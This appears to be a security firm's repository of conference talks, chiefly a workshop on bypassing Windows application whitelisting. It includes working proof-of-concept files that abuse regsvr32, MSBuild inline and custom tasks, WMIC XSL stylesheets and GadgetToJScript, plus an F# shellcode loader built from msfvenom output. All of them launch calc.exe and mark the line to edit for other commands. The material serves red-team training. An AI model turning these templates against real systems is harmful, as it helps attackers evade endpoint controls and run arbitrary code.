├── MSBuild Masterclass.pdf
├── Offensive Maldocs in 2020.pdf
├── README.md
└── grayhatcon2020
    ├── GadgetToJScript.exe
    ├── NDesk.Options.dll
    ├── README.md
    ├── calc.cs
    ├── calc.fsx
    ├── calc.txt
    ├── calc.xsl
    ├── custom.xml
    ├── gadget.cs
    ├── grayhatcon_presentation.pdf
    └── inline.xml


/MSBuild Masterclass.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FortyNorthSecurity/Presentations/77597c4710760f2247b458fb8bace1abcece37f5/MSBuild Masterclass.pdf


--------------------------------------------------------------------------------
/Offensive Maldocs in 2020.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FortyNorthSecurity/Presentations/77597c4710760f2247b458fb8bace1abcece37f5/Offensive Maldocs in 2020.pdf


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Presentations
 2 | A collection of presentations (and related resources) that we've given at FortyNorth Security
 3 | 
 4 | ## September 2021
 5 | #### Wild West Hackin' Fest
 6 | A Master Class on Offensive MSBuild by [@JoeLeonJr](https://github.com/joeleonjr) and [@ChrisTruncer](https://github.com/ChrisTruncer)  ([Slide Deck](https://github.com/FortyNorthSecurity/Presentations/blob/master/MSBuild%20Masterclass.pdf))
 7 | 
 8 | ## May 2021
 9 | #### x33fcon
10 | What the F# by [@JoeLeonJr](https://github.com/joeleonjr) and [@ChrisTruncer](https://github.com/ChrisTruncer)  ([Slide Deck](https://github.com/FortyNorthSecurity/What-The-F))
11 | 
12 | ## October 2020
13 | #### GrayHat Con
14 | A Practical Introduction to Bypassing Application Whitelisting by [@JoeLeonJr](https://github.com/joeleonjr) ([Slide Deck + Lab Resources](https://github.com/FortyNorthSecurity/Presentations/tree/master/grayhatcon2020))
15 | 
16 | ## September 2020
17 | #### Wild West Hackin' Fest Hackin' Cast
18 | Offensive Maldocs in 2020 by [@\_Matt_grandy_](https://github.com/mattgrandy) and [@JoeLeonJr](https://github.com/joeleonjr)
19 | ([Slide Deck](https://github.com/FortyNorthSecurity/Presentations/blob/master/Offensive%20Maldocs%20in%202020.pdf)) ([Video Recording](https://www.youtube.com/watch?v=RW5U9yxilf4&ab_channel=WildWestHackin%27Fest))
20 | 


--------------------------------------------------------------------------------
/grayhatcon2020/GadgetToJScript.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FortyNorthSecurity/Presentations/77597c4710760f2247b458fb8bace1abcece37f5/grayhatcon2020/GadgetToJScript.exe


--------------------------------------------------------------------------------
/grayhatcon2020/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FortyNorthSecurity/Presentations/77597c4710760f2247b458fb8bace1abcece37f5/grayhatcon2020/NDesk.Options.dll


--------------------------------------------------------------------------------
/grayhatcon2020/README.md:
--------------------------------------------------------------------------------
 1 | # GrayhatCon 2020
 2 | 
 3 | ## A Practical Introduction to Bypassing Application Whitelisting (by [@JoeLeonJr](https://github.com/joeleonjr))
 4 | 
 5 | Students taking this workshop will learn the fundamentals of how application whitelisting works and how to bypass it. This repository contains all of the files needed to conduct the workshop exercises. Video links to the workshop exercise demos are also included below. 
 6 | 
 7 | Requirements: a Windows VM or Host with Windows Defender + other A/V turned off. 
 8 | 
 9 | ### Workshop Exercise Files
10 | There are 6 exercises in this workshop. For each exercise, we've supplied a demo PoC file or files for you to use. All of these PoCs are publicly available in other repositories (most of them from @SubTee).
11 | 
12 | ###### RegSvr32 (Exercise #1)
13 | - calc.txt
14 | 
15 | ###### MSBuild Inline Task (Exercise #2)
16 | - inline.xml
17 | 
18 | ###### MSBuild Custom Tasks (Exercise #3)
19 | - custom.xml
20 | - calc.cs
21 | 
22 | ###### WMIC (Exercise #4)
23 | - calc.xsl
24 | 
25 | ###### WMIC GadgetToJScript (Exercise #5)
26 | - GadgetToJScript.exe (Compiled from: https://github.com/rasta-mouse/GadgetToJScript)
27 | - NDesk.Options.dll (Compiled from: https://github.com/rasta-mouse/GadgetToJScript)
28 | - calc.xsl
29 | - gadget.cs
30 | 
31 | ###### FSI (Exercise #6)
32 | - calc.fsx
33 | - https://www.dropbox.com/s/2acrszdgehper1q/fsi.zip?dl=0
34 |   - Link will expire Oct 31, 2020, but you can find the required files in any Visual Studio install under the FSharp folder
35 | 
36 | ### Workshop Exercise Demo Videos
37 | 
38 | All video passwords are: fortynorth
39 | 
40 | ###### RegSvr32 Bypass
41 | - https://vimeo.com/473422639
42 | 
43 | ###### WMIC Bypass
44 | - https://vimeo.com/473423161
45 | 
46 | ###### WMIC Bypass with GadgetToJScript
47 | - https://vimeo.com/473423853
48 | 
49 | ###### MSBuild Bypass with Inline Tasks
50 | - https://vimeo.com/473419763
51 | 
52 | ###### MSBuild Bypass without Command Line Args
53 | - https://vimeo.com/473420291
54 | 
55 | ###### MSBuild Bypass with Custom Tasks
56 | - https://vimeo.com/473418594
57 | 
58 | ###### MSBuild Bypass (Remotely hosted payload + XLM Excel 4.0 Macros)
59 | - https://vimeo.com/473420687
60 | 
61 | ###### FSI Bypass
62 | - https://vimeo.com/473417947
63 | 


--------------------------------------------------------------------------------
/grayhatcon2020/calc.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.InteropServices;
 5 | using Microsoft.Build.Framework;
 6 | using Microsoft.Build.Utilities;
 7 | 
 8 | namespace MyTasks
 9 | {
10 |     public class SimpleTask : Task
11 |     {
12 |         public override bool Execute()
13 |         {
14 |             Process.Start("calc.exe");
15 |             Console.WriteLine(this.MyProperty);
16 |             return true;
17 |         }
18 | 
19 | 
20 |         public string MyProperty { get; set; }
21 | 
22 |     }
23 | }


--------------------------------------------------------------------------------
/grayhatcon2020/calc.fsx:
--------------------------------------------------------------------------------
 1 | open System
 2 | open System.Runtime.InteropServices
 3 | open System.Threading
 4 |  
 5 | [<DllImport "kernel32" >]
 6 | extern nativeint VirtualAlloc(
 7 |   nativeint         lpStartAddress,
 8 |   uint32            dwSize, 
 9 |   uint32            flAllocationType, 
10 |   uint32         flProtect)
11 |  
12 | [<DllImport "kernel32" >]
13 | extern nativeint CreateThread(
14 |   uint32         lpThreadAttributes,
15 |   uint32            dwStackSize, 
16 |   nativeint            lpStartAddress, 
17 |   uint32&         param,
18 |   uint32         dwCreationFlags,
19 |   uint32&         lpThreadId)
20 |  
21 | [<DllImport "kernel32" >]
22 | extern nativeint WaitForSingleObject(
23 |   nativeint         hHandle,
24 |   uint32         dwMilliseconds)
25 |  
26 |   
27 | let mutable threadId : uint32 = (uint32)0
28 | let mutable pInfo : uint32 = (uint32)0
29 | 
30 | //msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f csharp
31 | //Find/Replace "," with "uy;", and then wrap all the shellcode in [|shellcode_goes_here|]
32 | 
33 | let mutable shellcode : byte[] = [|0x89uy;0xe6uy;0xdbuy;0xdauy;0xd9uy;0x76uy;0xf4uy;0x58uy;0x50uy;0x59uy;0x49uy;0x49uy;0x49uy;0x49uy;0x49uy;
34 | 0x49uy;0x49uy;0x49uy;0x49uy;0x49uy;0x43uy;0x43uy;0x43uy;0x43uy;0x43uy;0x43uy;0x37uy;0x51uy;0x5auy;0x6auy;
35 | 0x41uy;0x58uy;0x50uy;0x30uy;0x41uy;0x30uy;0x41uy;0x6buy;0x41uy;0x41uy;0x51uy;0x32uy;0x41uy;0x42uy;0x32uy;
36 | 0x42uy;0x42uy;0x30uy;0x42uy;0x42uy;0x41uy;0x42uy;0x58uy;0x50uy;0x38uy;0x41uy;0x42uy;0x75uy;0x4auy;0x49uy;
37 | 0x79uy;0x6cuy;0x68uy;0x68uy;0x4fuy;0x72uy;0x55uy;0x50uy;0x63uy;0x30uy;0x77uy;0x70uy;0x61uy;0x70uy;0x4euy;
38 | 0x69uy;0x4buy;0x55uy;0x55uy;0x61uy;0x79uy;0x50uy;0x70uy;0x64uy;0x4euy;0x6buy;0x42uy;0x70uy;0x50uy;0x30uy;
39 | 0x6cuy;0x4buy;0x32uy;0x72uy;0x66uy;0x6cuy;0x4euy;0x6buy;0x56uy;0x32uy;0x65uy;0x44uy;0x6cuy;0x4buy;0x42uy;
40 | 0x52uy;0x55uy;0x78uy;0x64uy;0x4fuy;0x38uy;0x37uy;0x50uy;0x4auy;0x54uy;0x66uy;0x56uy;0x51uy;0x6buy;0x4fuy;
41 | 0x6cuy;0x6cuy;0x75uy;0x6cuy;0x75uy;0x31uy;0x63uy;0x4cuy;0x36uy;0x62uy;0x44uy;0x6cuy;0x75uy;0x70uy;0x39uy;
42 | 0x51uy;0x4auy;0x6fuy;0x44uy;0x4duy;0x47uy;0x71uy;0x4fuy;0x37uy;0x7auy;0x42uy;0x6cuy;0x32uy;0x42uy;0x72uy;
43 | 0x43uy;0x67uy;0x6cuy;0x4buy;0x56uy;0x32uy;0x64uy;0x50uy;0x4cuy;0x4buy;0x33uy;0x7auy;0x55uy;0x6cuy;0x6cuy;
44 | 0x4buy;0x62uy;0x6cuy;0x56uy;0x71uy;0x64uy;0x38uy;0x4buy;0x53uy;0x70uy;0x48uy;0x43uy;0x31uy;0x58uy;0x51uy;
45 | 0x33uy;0x61uy;0x6cuy;0x4buy;0x43uy;0x69uy;0x77uy;0x50uy;0x73uy;0x31uy;0x4buy;0x63uy;0x6euy;0x6buy;0x32uy;
46 | 0x69uy;0x32uy;0x38uy;0x59uy;0x73uy;0x54uy;0x7auy;0x51uy;0x59uy;0x4cuy;0x4buy;0x75uy;0x64uy;0x4euy;0x6buy;
47 | 0x53uy;0x31uy;0x39uy;0x46uy;0x66uy;0x51uy;0x39uy;0x6fuy;0x6euy;0x4cuy;0x4fuy;0x31uy;0x6auy;0x6fuy;0x36uy;
48 | 0x6duy;0x73uy;0x31uy;0x4buy;0x77uy;0x66uy;0x58uy;0x6buy;0x50uy;0x72uy;0x55uy;0x4auy;0x56uy;0x37uy;0x73uy;
49 | 0x71uy;0x6duy;0x5auy;0x58uy;0x37uy;0x4buy;0x31uy;0x6duy;0x51uy;0x34uy;0x73uy;0x45uy;0x4auy;0x44uy;0x42uy;
50 | 0x78uy;0x6euy;0x6buy;0x52uy;0x78uy;0x76uy;0x44uy;0x56uy;0x61uy;0x79uy;0x43uy;0x70uy;0x66uy;0x6euy;0x6buy;
51 | 0x76uy;0x6cuy;0x30uy;0x4buy;0x4cuy;0x4buy;0x56uy;0x38uy;0x45uy;0x4cuy;0x65uy;0x51uy;0x4euy;0x33uy;0x6euy;
52 | 0x6buy;0x36uy;0x64uy;0x4cuy;0x4buy;0x76uy;0x61uy;0x48uy;0x50uy;0x4duy;0x59uy;0x30uy;0x44uy;0x57uy;0x54uy;
53 | 0x56uy;0x44uy;0x63uy;0x6buy;0x51uy;0x4buy;0x43uy;0x51uy;0x70uy;0x59uy;0x50uy;0x5auy;0x33uy;0x61uy;0x4buy;
54 | 0x4fuy;0x69uy;0x70uy;0x63uy;0x6fuy;0x33uy;0x6fuy;0x33uy;0x6auy;0x4cuy;0x4buy;0x46uy;0x72uy;0x4auy;0x4buy;
55 | 0x4euy;0x6duy;0x51uy;0x4duy;0x63uy;0x5auy;0x77uy;0x71uy;0x4cuy;0x4duy;0x4fuy;0x75uy;0x48uy;0x32uy;0x47uy;
56 | 0x70uy;0x37uy;0x70uy;0x53uy;0x30uy;0x66uy;0x30uy;0x45uy;0x38uy;0x76uy;0x51uy;0x6euy;0x6buy;0x52uy;0x4fuy;
57 | 0x4duy;0x57uy;0x59uy;0x6fuy;0x4buy;0x65uy;0x6duy;0x6buy;0x5auy;0x50uy;0x78uy;0x35uy;0x69uy;0x32uy;0x52uy;
58 | 0x76uy;0x31uy;0x78uy;0x79uy;0x36uy;0x7auy;0x35uy;0x4duy;0x6duy;0x6duy;0x4duy;0x6buy;0x4fuy;0x6auy;0x75uy;
59 | 0x35uy;0x6cuy;0x36uy;0x66uy;0x43uy;0x4cuy;0x45uy;0x5auy;0x4fuy;0x70uy;0x6buy;0x4buy;0x6buy;0x50uy;0x34uy;
60 | 0x35uy;0x56uy;0x65uy;0x4duy;0x6buy;0x51uy;0x57uy;0x32uy;0x33uy;0x64uy;0x32uy;0x32uy;0x4fuy;0x50uy;0x6auy;
61 | 0x33uy;0x30uy;0x73uy;0x63uy;0x59uy;0x6fuy;0x4euy;0x35uy;0x35uy;0x33uy;0x43uy;0x51uy;0x70uy;0x6cuy;0x45uy;
62 | 0x33uy;0x44uy;0x6euy;0x65uy;0x35uy;0x43uy;0x48uy;0x43uy;0x55uy;0x43uy;0x30uy;0x41uy;0x41uy;|]
63 |  
64 | let address = VirtualAlloc((nativeint)0, (uint32)shellcode.Length, (uint32)0x1000, (uint32)0x40)
65 |  
66 | Marshal.Copy(shellcode, 0, address, shellcode.Length)
67 | let hThread = CreateThread((uint32)0,(uint32)0, address, &pInfo, (uint32)0, &threadId)
68 | WaitForSingleObject(hThread, (uint32)0xFFFFFFFF) |> ignore


--------------------------------------------------------------------------------
/grayhatcon2020/calc.txt:
--------------------------------------------------------------------------------
 1 | <?XML version="1.0"?>
 2 | <scriptlet>
 3 | 
 4 | <registration
 5 |     description="Bandit"
 6 |     progid="Bandit"
 7 |     version="1.00"
 8 |     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 9 | 	>
10 | 	<!-- Proof Of Concept - Casey Smith @subTee -->
11 | 	<script language="JScript">
12 | 		<![CDATA[
13 | 	
14 | 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
15 | 	
16 | 		]]>
17 | 	</script>
18 | </registration>
19 | </scriptlet>
20 | 


--------------------------------------------------------------------------------
/grayhatcon2020/calc.xsl:
--------------------------------------------------------------------------------
 1 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
 2 | <xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
 3 | <xsl:strip-space elements="*" />
 4 | <ms:script implements-prefix="user" language="JScript">
 5 | 	<![CDATA[
 6 | 
 7 | 		//EDIT THIS LINE TO RUN SOMETHING OTHER THAN CALC
 8 | 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe")
 9 | 		
10 |  	]]>
11 | </ms:script>
12 | <xsl:template match="/"><xsl:apply-templates select="//RESULTS"/><xsl:apply-templates select="//INSTANCE"/><xsl:value-of select="user:DisplayValues(.)"/></xsl:template>
13 | <xsl:template match="RESULTS"><xsl:value-of select="user:CountResults(.)"/></xsl:template>
14 | <xsl:template match="INSTANCE"><xsl:value-of select="user:GotInstance()"/><xsl:apply-templates select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"/></xsl:template>
15 | <xsl:template match="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:value-of select="user:GetValues(.)"/></xsl:template>
16 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/grayhatcon2020/custom.xml:
--------------------------------------------------------------------------------
1 |  <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 |         <Target Name="MyTarget">
3 |             <SimpleTask MyProperty="Example of a variable passed in from the xml file to the cs file (dll)."/>
4 |         </Target>
5 |     <UsingTask TaskName="SimpleTask" AssemblyFile="calc.dll" />
6 | </Project>


--------------------------------------------------------------------------------
/grayhatcon2020/gadget.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | 
 4 | public class Same
 5 | 	{
 6 | 		public Same()
 7 | 		{
 8 | 			Process.Start("calc.exe");
 9 | 		}
10 | 	}


--------------------------------------------------------------------------------
/grayhatcon2020/grayhatcon_presentation.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FortyNorthSecurity/Presentations/77597c4710760f2247b458fb8bace1abcece37f5/grayhatcon2020/grayhatcon_presentation.pdf


--------------------------------------------------------------------------------
/grayhatcon2020/inline.xml:
--------------------------------------------------------------------------------
 1 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 2 |   <!-- This inline task executes c# code. -->
 3 |   <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe inline.xml -->
 4 |   <!-- Author: Casey Smith, Twitter: @subTee -->
 5 |   <!-- License: BSD 3-Clause -->
 6 | <Target Name="calc">
 7 | 	<ClassExample />
 8 | </Target>
 9 |   <UsingTask
10 |     TaskName="ClassExample"
11 |     TaskFactory="CodeTaskFactory"
12 |     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
13 | 	<Task>
14 | 	  <Reference Include="System.Management.Automation" />
15 |       <Code Type="Class" Language="cs">
16 |         <![CDATA[
17 | 			using System;
18 | 			using System.IO;
19 | 			using System.Diagnostics;
20 | 			using System.Reflection;
21 | 			using System.Runtime.InteropServices;
22 | 			using Microsoft.Build.Framework;
23 | 			using Microsoft.Build.Utilities;
24 | 
25 | 			//Add For PowerShell Invocation
26 | 			using System.Collections.ObjectModel;
27 | 			using System.Management.Automation;
28 | 			using System.Management.Automation.Runspaces;
29 | 			using System.Text;
30 | 
31 | 			public class ClassExample :  Task, ITask
32 | 			{
33 | 				public override bool Execute()
34 | 				{
35 | 					try
36 | 					{
37 | 						//EDIT THIS LINE
38 | 						Console.Write(RunPSCommand("calc"));
39 | 					}
40 | 					catch (Exception e)
41 | 					{
42 | 						Console.Write(e.Message);
43 | 					}
44 | 					return true;
45 | 				}
46 | 				
47 | 				//Based on Jared Atkinson's And Justin Warner's Work
48 | 				public static string RunPSCommand(string cmd)
49 | 				{
50 | 					Runspace runspace = RunspaceFactory.CreateRunspace();
51 | 					runspace.Open();
52 | 					RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
53 | 					Pipeline pipeline = runspace.CreatePipeline();
54 | 					pipeline.Commands.AddScript(cmd);
55 | 					pipeline.Commands.Add("Out-String");
56 | 					Collection<PSObject> results = pipeline.Invoke();
57 | 					runspace.Close();
58 | 					StringBuilder stringBuilder = new StringBuilder();
59 | 					foreach (PSObject obj in results)
60 | 					{
61 | 						stringBuilder.Append(obj);
62 | 					}
63 | 					return stringBuilder.ToString().Trim();
64 | 				 }
65 | 			}
66 |         ]]>
67 |       </Code>
68 |     </Task>
69 |   </UsingTask>
70 | </Project>


--------------------------------------------------------------------------------